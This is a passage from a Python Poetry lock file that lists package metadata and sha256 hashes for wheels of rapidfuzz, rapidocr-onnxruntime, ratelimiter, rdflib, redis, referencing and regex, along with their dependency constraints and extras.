{file = "rapidfuzz-3.4.0-cp310-cp310-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d1d81d380ceabc8297880525c9d8b9e93fead38d3d2254e558c36c18aaf2553f"},
{file = "rapidfuzz-3.4.0-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:a716efcfc92659d8695291f07da4fa60f42a131dc4ceab583931452dd5662e92"},
{file = "rapidfuzz-3.4.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:83387fb81c4c0234b199110655779762dd5982cdf9de4f7c321110713193133e"},
{file = "rapidfuzz-3.4.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:55efb3231bb954f3597313ebdf104289b8d139d5429ad517051855f84e12b94e"},
{file = "rapidfuzz-3.4.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:51d47d52c890cbdb2d8b2085d747e557f15efd9c990cb6ae624c8f6948c4aa3a"},
{file = "rapidfuzz-3.4.0-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:3db79070888d0dcd4f6a20fd30b8184dd975d6b0f7818acff5d7e07eba19b71f"},
{file = "rapidfuzz-3.4.0-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:46efc5e4675e2bd5118427513f86eaf3689e1482ebd309ad4532bcefae78179d"},
{file = "rapidfuzz-3.4.0-cp310-cp310-musllinux_1_1_s390x.whl", hash = "sha256:d15c364c5aa8f032dadf5b82fa02b7a4bd9688a961a27961cd5b985203f58037"},
{file = "rapidfuzz-3.4.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:f1e91460baa42f5408f3c062913456a24b2fc1a181959b58a9c06b5eef700ca6"},
{file = "rapidfuzz-3.4.0-cp310-cp310-win32.whl", hash = "sha256:c7f4f6dac25c120de8845a65a97090658c8a976827ac22b6b86e2a16a60bb820"},
{file = "rapidfuzz-3.4.0-cp310-cp310-win_amd64.whl", hash = "sha256:124578029d926b2be32d60b748be95ee0de6cb2753eb49d6d1d6146269b428b9"},
{file = "rapidfuzz-3.4.0-cp310-cp310-win_arm64.whl", hash = "sha256:3af0384132e79fe6f6370d49347649382e04f689277525903bef84d30f3992fd"},
{file = "rapidfuzz-3.4.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:66ff93b81b382269dc7c2d46c839ce72e2d2331ad46a06321770bc94016fe236"},
{file = "rapidfuzz-3.4.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:da2764604a31fd1e3f1cacf226b43a871cc9f28844a3196c2a6b1ba52ae12922"},
{file = "rapidfuzz-3.4.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:8eb33895353bfcc33ccf4b4bae837c0afb4eaf20a0361aa6f0800cef12505e91"},
{file = "rapidfuzz-3.4.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ed3da08830c08c8bcd49414cc06b704a760d3067804775facc0df725b52085a4"},
{file = "rapidfuzz-3.4.0-cp311-cp311-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:b38c7021f6114cfacba5717192fb3e1e50053261d49a774e645021a2f77e20a3"},
{file = "rapidfuzz-3.4.0-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:f7f5ea97886d2ec7b2b9a8172812a76e1d243f2ce705c2f24baf46f9ef5d3951"},
{file = "rapidfuzz-3.4.0-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:5b9a7ab061c1b75b274fc2ebd1d29cfa2e510c36e2f4cd9518a6d56d589003c8"},
{file = "rapidfuzz-3.4.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:23b07685c21c93cdf6d68b49eccacfe975651b8d99ea8a02687400c60315e5bc"},
{file = "rapidfuzz-3.4.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:c2a564f748497b6a5e08a1dc0ac06655f65377cf072c4f0e2c73818acc655d36"},
{file = "rapidfuzz-3.4.0-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:ef30b5f2720f0acbcfba0e0661a4cc118621c47cf69b5fe92531dfed1e369e1c"},
{file = "rapidfuzz-3.4.0-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:ab981f9091ae8bd32bca9289fa1019b4ec656543489e7e13e64882d57d989282"},
{file = "rapidfuzz-3.4.0-cp311-cp311-musllinux_1_1_s390x.whl", hash = "sha256:a80f9aa4245a49e0677896d1b51b2b3bc36472aff7cec31c4a96f789135f03fe"},
{file = "rapidfuzz-3.4.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:0d8c6cb80b5d2edf88bf6a88ac6827a353c974405c2d7e3025ed9527a5dbe1a6"},
{file = "rapidfuzz-3.4.0-cp311-cp311-win32.whl", hash = "sha256:c0150d521199277b5ad8bd3b060a5f3c1dbdf11df0533b4d79f458ef11d07e8c"},
{file = "rapidfuzz-3.4.0-cp311-cp311-win_amd64.whl", hash = "sha256:bd50bc90167601963e2a90b820fb862d239ecb096a991bf3ce33ffaa1d6eedee"},
{file = "rapidfuzz-3.4.0-cp311-cp311-win_arm64.whl", hash = "sha256:bd10d68baabb63a3bb36b683f98fc481fcc62230e493e4b31e316bd5b299ef68"},
{file = "rapidfuzz-3.4.0-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:7f497f850d46c5e08f3340343842a28ede5d3997e5d1cadbd265793cf47417e5"},
{file = "rapidfuzz-3.4.0-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:a7d6a9f04ea1277add8943d4e144e59215009f54f2668124ff26dee18a875343"},
{file = "rapidfuzz-3.4.0-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:b6fe2aff0d9b35191701714e05afe08f79eaea376a3a6ca802b72d9e5b48b545"},
{file = "rapidfuzz-3.4.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b81b8bc29114ca861fed23da548a837832b85495b0c1b2600e6060e3cf4d50aa"},
{file = "rapidfuzz-3.4.0-cp312-cp312-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:805dc2aa3ac295dcbf2df8c1e420e8a73b1f632d6820a5a1c8506d22c11e0f27"},
{file = "rapidfuzz-3.4.0-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:1276c7f50cd90a48b00084feb25256135c9ace6c599295dd5932949ec30c0e70"},
{file = "rapidfuzz-3.4.0-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:0b9197656a6d71483959bf7d216e7fb7a6b80ca507433bcb3015fb92abc266f8"},
{file = "rapidfuzz-3.4.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3456f4df5b8800315fd161045c996479016c112228e4da370d09ed80c24853e5"},
{file = "rapidfuzz-3.4.0-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:734046d557550589edb83d5ad1468a1341d1092f1c64f26fd0b1fc50f9efdce1"},
{file = "rapidfuzz-3.4.0-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:37d5f0fbad6c092c89840eea2c4c845564d40849785de74c5e6ff48b47b0ecf6"},
{file = "rapidfuzz-3.4.0-cp312-cp312-musllinux_1_1_ppc64le.whl", hash = "sha256:bfe14711b9a7b744e242a482c6cabb696517a1a9946fc1e88d353cd3eb384788"},
{file = "rapidfuzz-3.4.0-cp312-cp312-musllinux_1_1_s390x.whl", hash = "sha256:1a733c10b1fcc47f837c23ab4a255cc4021a88939ff81baa64d6738231cba33d"},
{file = "rapidfuzz-3.4.0-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:929e6b71e5b36caee2ee11c209e75a0fcbd716a1b76ae6162b89ee9b591b63b1"},
{file = "rapidfuzz-3.4.0-cp312-cp312-win32.whl", hash = "sha256:c56073ba1d1b25585359ad9769163cb2f3183e7a03c03b914a0667fcbd95dc5c"},
{file = "rapidfuzz-3.4.0-cp312-cp312-win_amd64.whl", hash = "sha256:bf58ba21df06fc8aeef3056fd137eca0a593c2f5c82923a4524d251dc5f3df5d"},
{file = "rapidfuzz-3.4.0-cp312-cp312-win_arm64.whl", hash = "sha256:f3effbe9c677658b3149da0d2778a740a6b7d8190c1407fd0c0770a4e223cfe0"},
{file = "rapidfuzz-3.4.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:ed0d5761b44d9dd87278d5c32903bb55632346e4d84ea67ba2e4a84afc3b7d45"},
{file = "rapidfuzz-3.4.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1bafbd3e2e9e0b5f740f66155cc7e1e23eee1e1f2c44eff12daf14f90af0e8ab"},
{file = "rapidfuzz-3.4.0-cp37-cp37m-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:2543fd8d0fb3b1ac065bf94ee54c0ea33343c62481d8e54b6117a88c92c9b721"},
{file = "rapidfuzz-3.4.0-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:93ceb62ade1a0e62696487274002157a58bb751fc82cd25016fc5523ba558ca5"},
{file = "rapidfuzz-3.4.0-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:76f4162ce5fe08609455d318936ed4aa709f40784be61fb4e200a378137b0230"},
{file = "rapidfuzz-3.4.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f723197f2dbce508a7030dcf6d3fc940117aa54fc876021bf6f6feeaf3825ba1"},
{file = "rapidfuzz-3.4.0-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:cfdc74afd93ac71270b5be5c25cb864b733b9ae32b07495705a6ac294ac4c390"},
{file = "rapidfuzz-3.4.0-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:273c7c7f5b405f2f54d41e805883572d57e1f0a56861f93ca5a6733672088acb"},
{file = "rapidfuzz-3.4.0-cp37-cp37m-musllinux_1_1_ppc64le.whl", hash = "sha256:712dd91d429afaddbf7e86662155f2ad9bc8135fca5803a01035a3c1d76c5977"},
{file = "rapidfuzz-3.4.0-cp37-cp37m-musllinux_1_1_s390x.whl", hash = "sha256:9814905414696080d8448d6e6df788a0148954ab34d7cd8d75bcb85ba30e0b25"},
{file = "rapidfuzz-3.4.0-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:01013ee67fb15608c8c5961af3bc2b1f242cff94c19f53237c9b3f0edb8e0a2d"},
{file = "rapidfuzz-3.4.0-cp37-cp37m-win32.whl", hash = "sha256:8f5d2adc48c181486125d42230e80479a1e0568942e883d1ebdeb76cd3f83470"},
{file = "rapidfuzz-3.4.0-cp37-cp37m-win_amd64.whl", hash = "sha256:c92d847c997c384670e3b4cf6727cb73a4d7a7ba6457310e2083cf06d56013c4"},
{file = "rapidfuzz-3.4.0-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:d0bda173b0ec1fa546f123088c0d42c9096304771b4c0555d4e08a66a246b3f6"},
{file = "rapidfuzz-3.4.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:bbb05b1203f683b341f44ebe8fe38afed6e56f606094f9840d6406e4a7bf0eab"},
{file = "rapidfuzz-3.4.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:f0075ff8990437923da42202b60cf04b5c122ee2856f0cf2344fb890cadecf57"},
{file = "rapidfuzz-3.4.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9f295842c282fe7fe93bfe7a20e78f33f43418f47fb601f2f0a05df8a8282b43"},
{file = "rapidfuzz-3.4.0-cp38-cp38-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:1ebee7313719dfe652debb74bdd4024e8cf381a59adc6d065520ff927f3445f4"},
{file = "rapidfuzz-3.4.0-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:f71454249ddd29d8ba5415ed7307e7b7493fc7e9018f1ff496127b8b9a8df94b"},
{file = "rapidfuzz-3.4.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:52c6b7a178f0e800488fa1aede17b00f6397cab0b79d48531504b0d89e45315f"},
{file = "rapidfuzz-3.4.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6d38596c804a9f2bd49360c15e1f4afbf016f181fe37fc4f1a4ddd247d3e91e5"},
{file = "rapidfuzz-3.4.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:8756461e7ee79723b8f762fc6db226e65eb453bf9fa64b14fc0274d4aaaf9e21"},
{file = "rapidfuzz-3.4.0-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:e14799297f194a4480f373e45142ef16d5dc68a42084c0e2018e0bdba56a8fef"},
{file = "rapidfuzz-3.4.0-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:f813fb663d90038c1171d30ea1b6b275e09fced32f1d12b972c6045d9d4233f2"},
{file = "rapidfuzz-3.4.0-cp38-cp38-musllinux_1_1_s390x.whl", hash = "sha256:0df66e07e42e2831fae84dea481f7803bec7cfa53c31d770e86ac47bb18dcd57"},
{file = "rapidfuzz-3.4.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:b05c7d4b4ddb617e977d648689013e50e5688140ee03538d3760a3a11d4fa8a2"},
{file = "rapidfuzz-3.4.0-cp38-cp38-win32.whl", hash = "sha256:74b9a1c1fc139d325fb0b89ccc85527d27096a76f6ed690ee3378143cc38e91d"},
{file = "rapidfuzz-3.4.0-cp38-cp38-win_amd64.whl", hash = "sha256:5fe3ef7daecd79f852936528e37528fd88818bc000991e0fea23b9ac5b79e875"},
{file = "rapidfuzz-3.4.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:61f16bb0f3026853500e7968261831a2e1a35d56947752bb6cf6953afd70b9de"},
{file = "rapidfuzz-3.4.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:d188e8fb5a9709931c6a48cc62c4ac9b9d163969333711e426d9dbd134c1489b"},
{file = "rapidfuzz-3.4.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:c006aa481d1b91c2600920ce16e42d208a4b6f318d393aef4dd2172d568f2641"},
{file = "rapidfuzz-3.4.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:02afbe7ed12e9191082ed7bda43398baced1d9d805302b7b010d397de3ae973f"},
{file = "rapidfuzz-3.4.0-cp39-cp39-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:01d64710060bc3241c08ac1f1a9012c7184f3f4c3d6e2eebb16c6093a03f6a67"},
{file = "rapidfuzz-3.4.0-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:d3198f70b97127e52a4f96bb2f7de447f89baa338ff398eb126930c8e3137ad1"},
{file = "rapidfuzz-3.4.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:50ad7bac98a0f00492687eddda73d2c0bdf71c78b52fddaa5901634ae323d3ce"},
{file = "rapidfuzz-3.4.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:cc3efc06db79e818f4a6783a4e001b3c8b2c61bd05c0d5c4d333adaf64ed1b34"},
{file = "rapidfuzz-3.4.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:75d1365387ec8ef2128fd7e2f7436aa1a04a1953bc6d7068835bb769cd07c146"},
{file = "rapidfuzz-3.4.0-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:a0750278693525b5ce58d3b313e432dfa5d90f00d06ae54fa8cde87f2a397eb0"},
{file = "rapidfuzz-3.4.0-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:2e49151572b842d290dcee2cc6f9ce7a7b40b77cc20d0f6d6b54e7afb7bafa5c"},
{file = "rapidfuzz-3.4.0-cp39-cp39-musllinux_1_1_s390x.whl", hash = "sha256:8b38d7677b2f20b137bb7aaf0dcd3d8ac2a2cde65f09f5621bf3f57d9a1e5d6e"},
{file = "rapidfuzz-3.4.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:d904ac97f2e370f91e8170802669c8ad68641bf84d742968416b53c5960410c6"},
{file = "rapidfuzz-3.4.0-cp39-cp39-win32.whl", hash = "sha256:53bbef345644eac1c2d7cc21ade4fe9554fa289f60eb2c576f7fdc454dbc0641"},
{file = "rapidfuzz-3.4.0-cp39-cp39-win_amd64.whl", hash = "sha256:233bf022938c38060a93863ec548e624d69a56d7384634d8bea435b915b88e52"},
{file = "rapidfuzz-3.4.0-cp39-cp39-win_arm64.whl", hash = "sha256:63933792146f3d333680d415cecc237e6275b42ad948d0a798f9a81325517666"},
{file = "rapidfuzz-3.4.0-pp37-pypy37_pp73-macosx_10_9_x86_64.whl", hash = "sha256:e182ea5c809e7ed36ebfbcef4bb1808e213d27b33c036007a33bcbb7ba498356"},
{file = "rapidfuzz-3.4.0-pp37-pypy37_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9e1142c8d35fa6f3af8150d02ff8edcbea3723c851d889e8b2172e0d1b99f3f7"},
{file = "rapidfuzz-3.4.0-pp37-pypy37_pp73-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6b8258846e56b03230fa733d29bb4f9fb1f4790ac97d1ebe9faa3ff9d2850999"},
{file = "rapidfuzz-3.4.0-pp37-pypy37_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:950d1dfd2927cd45c9bb2927933926718f0a17792841e651d42f4d1cb04a5c1d"},
{file = "rapidfuzz-3.4.0-pp37-pypy37_pp73-win_amd64.whl", hash = "sha256:dd54dd0355225dc3c1d55e233d510adcccee9bb25d656b4cf1136114b92e7bf3"},
{file = "rapidfuzz-3.4.0-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:f5921780e7995e9ac3cea41fa57b623159d7295788618d3f2946d61328c25c25"},
{file = "rapidfuzz-3.4.0-pp38-pypy38_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:fc4b1b69a64d337c40fa07a721dae1b1550d90f17973fb348055f6440d597e26"},
{file = "rapidfuzz-3.4.0-pp38-pypy38_pp73-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6f5c8b901b6d3be63591c68e2612f76ad85af27193d0a88d4d87bb047aeafcb3"},
{file = "rapidfuzz-3.4.0-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c67f5ced39aff6277dd772b239ef8aa8fc810200a3b42f69ddbb085ea0e18232"},
{file = "rapidfuzz-3.4.0-pp38-pypy38_pp73-win_amd64.whl", hash = "sha256:4fd94acab871afbc845400814134a83512a711e824dc2c9a9776d6123464a221"},
{file = "rapidfuzz-3.4.0-pp39-pypy39_pp73-macosx_10_9_x86_64.whl", hash = "sha256:437508ec1ea6e71a77126715ac6208cb9c3e74272536ebfa79be9dd008cfb85f"},
{file = "rapidfuzz-3.4.0-pp39-pypy39_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a7215f7c5de912b364d5cf7c4c66915ccf4acf71aafbb8da62ad346569196e15"},
{file = "rapidfuzz-3.4.0-pp39-pypy39_pp73-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:698488002eb7be2f737e48679ed0cd310b76291f26d8ec792db8345d13eb6573"},
{file = "rapidfuzz-3.4.0-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e77873126eb07e7461f0b675263e6c5d42c8a952e88e4a44eeff96f237b2b024"},
{file = "rapidfuzz-3.4.0-pp39-pypy39_pp73-win_amd64.whl", hash = "sha256:28d03cd33817f6e0bea9b618b460f85ff9c9c3fedc6c19cfa0992f719a0d1801"},
{file = "rapidfuzz-3.4.0.tar.gz", hash = "sha256:a74112e2126b428c77db5e96f7ce34e91e750552147305b2d361122cbede2955"},
]
[package.extras]
full = ["numpy"]
[[package]]
name = "rapidocr-onnxruntime"
version = "1.3.7"
description = "A cross platform OCR Library based on OnnxRuntime."
optional = true
python-versions = ">=3.6,<3.12"
files = [
{file = "rapidocr_onnxruntime-1.3.7-py3-none-any.whl", hash = "sha256:9d061786f6255c57a98f04a2f7624eacabc1d0dede2a69707c99a6dd9024e6fa"},
]
[package.dependencies]
numpy = ">=1.19.5"
onnxruntime = ">=1.7.0"
opencv-python = ">=4.5.1.48"
Pillow = "*"
pyclipper = ">=1.2.0"
PyYAML = "*"
Shapely = ">=1.7.1"
six = ">=1.15.0"
[[package]]
name = "ratelimiter"
version = "1.2.0.post0"
description = "Simple python rate limiting object"
optional = true
python-versions = "*"
files = [
{file = "ratelimiter-1.2.0.post0-py3-none-any.whl", hash = "sha256:a52be07bc0bb0b3674b4b304550f10c769bbb00fead3072e035904474259809f"},
{file = "ratelimiter-1.2.0.post0.tar.gz", hash = "sha256:5c395dcabdbbde2e5178ef3f89b568a3066454a6ddc223b76473dac22f89b4f7"},
]
[package.extras]
test = ["pytest (>=3.0)", "pytest-asyncio"]
[[package]]
name = "rdflib"
version = "6.3.2"
description = "RDFLib is a Python library for working with RDF, a simple yet powerful language for representing information."
optional = true
python-versions = ">=3.7,<4.0"
files = [
{file = "rdflib-6.3.2-py3-none-any.whl", hash = "sha256:36b4e74a32aa1e4fa7b8719876fb192f19ecd45ff932ea5ebbd2e417a0247e63"},
{file = "rdflib-6.3.2.tar.gz", hash = "sha256:72af591ff704f4caacea7ecc0c5a9056b8553e0489dd4f35a9bc52dbd41522e0"},
]
[package.dependencies]
isodate = ">=0.6.0,<0.7.0"
pyparsing = ">=2.1.0,<4"
[package.extras]
berkeleydb = ["berkeleydb (>=18.1.0,<19.0.0)"]
html = ["html5lib (>=1.0,<2.0)"]
lxml = ["lxml (>=4.3.0,<5.0.0)"]
networkx = ["networkx (>=2.0.0,<3.0.0)"]
[[package]]
name = "redis"
version = "4.6.0"
description = "Python client for Redis database and key-value store"
optional = true
python-versions = ">=3.7"
files = [
{file = "redis-4.6.0-py3-none-any.whl", hash = "sha256:e2b03db868160ee4591de3cb90d40ebb50a90dd302138775937f6a42b7ed183c"},
{file = "redis-4.6.0.tar.gz", hash = "sha256:585dc516b9eb042a619ef0a39c3d7d55fe81bdb4df09a52c9cdde0d07bf1aa7d"},
]
[package.dependencies]
async-timeout = {version = ">=4.0.2", markers = "python_full_version <= \"3.11.2\""}
[package.extras]
hiredis = ["hiredis (>=1.0.0)"]
ocsp = ["cryptography (>=36.0.1)", "pyopenssl (==20.0.1)", "requests (>=2.26.0)"]
[[package]]
name = "referencing"
version = "0.30.2"
description = "JSON Referencing + Python"
optional = false
python-versions = ">=3.8"
files = [
{file = "referencing-0.30.2-py3-none-any.whl", hash = "sha256:449b6669b6121a9e96a7f9e410b245d471e8d48964c67113ce9afe50c8dd7bdf"},
{file = "referencing-0.30.2.tar.gz", hash = "sha256:794ad8003c65938edcdbc027f1933215e0d0ccc0291e3ce20a4d87432b59efc0"},
]
[package.dependencies]
attrs = ">=22.2.0"
rpds-py = ">=0.7.0"
[[package]]
name = "regex"
version = "2023.10.3"
description = "Alternative regular expression module, to replace re."
optional = false
python-versions = ">=3.7"
files = [
{file = "regex-2023.10.3-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:4c34d4f73ea738223a094d8e0ffd6d2c1a1b4c175da34d6b0de3d8d69bee6bcc"},
{file = "regex-2023.10.3-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:a8f4e49fc3ce020f65411432183e6775f24e02dff617281094ba6ab079ef0915"},
{file = "regex-2023.10.3-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4cd1bccf99d3ef1ab6ba835308ad85be040e6a11b0977ef7ea8c8005f01a3c29"},
{file = "regex-2023.10.3-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:81dce2ddc9f6e8f543d94b05d56e70d03a0774d32f6cca53e978dc01e4fc75b8"},
{file = "regex-2023.10.3-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:9c6b4d23c04831e3ab61717a707a5d763b300213db49ca680edf8bf13ab5d91b"},
{file = "regex-2023.10.3-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c15ad0aee158a15e17e0495e1e18741573d04eb6da06d8b84af726cfc1ed02ee"},
{file = "regex-2023.10.3-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6239d4e2e0b52c8bd38c51b760cd870069f0bdf99700a62cd509d7a031749a55"},
{file = "regex-2023.10.3-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:4a8bf76e3182797c6b1afa5b822d1d5802ff30284abe4599e1247be4fd6b03be"},
{file = "regex-2023.10.3-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:d9c727bbcf0065cbb20f39d2b4f932f8fa1631c3e01fcedc979bd4f51fe051c5"},
{file = "regex-2023.10.3-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:3ccf2716add72f80714b9a63899b67fa711b654be3fcdd34fa391d2d274ce767"},
{file = "regex-2023.10.3-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:107ac60d1bfdc3edb53be75e2a52aff7481b92817cfdddd9b4519ccf0e54a6ff"},
{file = "regex-2023.10.3-cp310-cp310-musllinux_1_1_s390x.whl", hash = "sha256:00ba3c9818e33f1fa974693fb55d24cdc8ebafcb2e4207680669d8f8d7cca79a"},
{file = "regex-2023.10.3-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:f0a47efb1dbef13af9c9a54a94a0b814902e547b7f21acb29434504d18f36e3a"},
{file = "regex-2023.10.3-cp310-cp310-win32.whl", hash = "sha256:36362386b813fa6c9146da6149a001b7bd063dabc4d49522a1f7aa65b725c7ec"},
{file = "regex-2023.10.3-cp310-cp310-win_amd64.whl", hash = "sha256:c65a3b5330b54103e7d21cac3f6bf3900d46f6d50138d73343d9e5b2900b2353"},
{file = "regex-2023.10.3-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:90a79bce019c442604662d17bf69df99090e24cdc6ad95b18b6725c2988a490e"},
{file = "regex-2023.10.3-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:c7964c2183c3e6cce3f497e3a9f49d182e969f2dc3aeeadfa18945ff7bdd7051"},
{file = "regex-2023.10.3-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4ef80829117a8061f974b2fda8ec799717242353bff55f8a29411794d635d964"},
{file = "regex-2023.10.3-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:5addc9d0209a9afca5fc070f93b726bf7003bd63a427f65ef797a931782e7edc"},
{file = "regex-2023.10.3-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:c148bec483cc4b421562b4bcedb8e28a3b84fcc8f0aa4418e10898f3c2c0eb9b"},
{file = "regex-2023.10.3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8d1f21af4c1539051049796a0f50aa342f9a27cde57318f2fc41ed50b0dbc4ac"},
{file = "regex-2023.10.3-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:0b9ac09853b2a3e0d0082104036579809679e7715671cfbf89d83c1cb2a30f58"},
{file = "regex-2023.10.3-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:ebedc192abbc7fd13c5ee800e83a6df252bec691eb2c4bedc9f8b2e2903f5e2a"},
{file = "regex-2023.10.3-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:d8a993c0a0ffd5f2d3bda23d0cd75e7086736f8f8268de8a82fbc4bd0ac6791e"},
{file = "regex-2023.10.3-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:be6b7b8d42d3090b6c80793524fa66c57ad7ee3fe9722b258aec6d0672543fd0"},
{file = "regex-2023.10.3-cp311-cp311-musllinux_1_1_s390x.whl", hash = "sha256:4023e2efc35a30e66e938de5aef42b520c20e7eda7bb5fb12c35e5d09a4c43f6"},
{file = "regex-2023.10.3-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:0d47840dc05e0ba04fe2e26f15126de7c755496d5a8aae4a08bda4dd8d646c54"},
{file = "regex-2023.10.3-cp311-cp311-win32.whl", hash = "sha256:9145f092b5d1977ec8c0ab46e7b3381b2fd069957b9862a43bd383e5c01d18c2"},
{file = "regex-2023.10.3-cp311-cp311-win_amd64.whl", hash = "sha256:b6104f9a46bd8743e4f738afef69b153c4b8b592d35ae46db07fc28ae3d5fb7c"},
{file = "regex-2023.10.3-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:bff507ae210371d4b1fe316d03433ac099f184d570a1a611e541923f78f05037"},
{file = "regex-2023.10.3-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:be5e22bbb67924dea15039c3282fa4cc6cdfbe0cbbd1c0515f9223186fc2ec5f"},
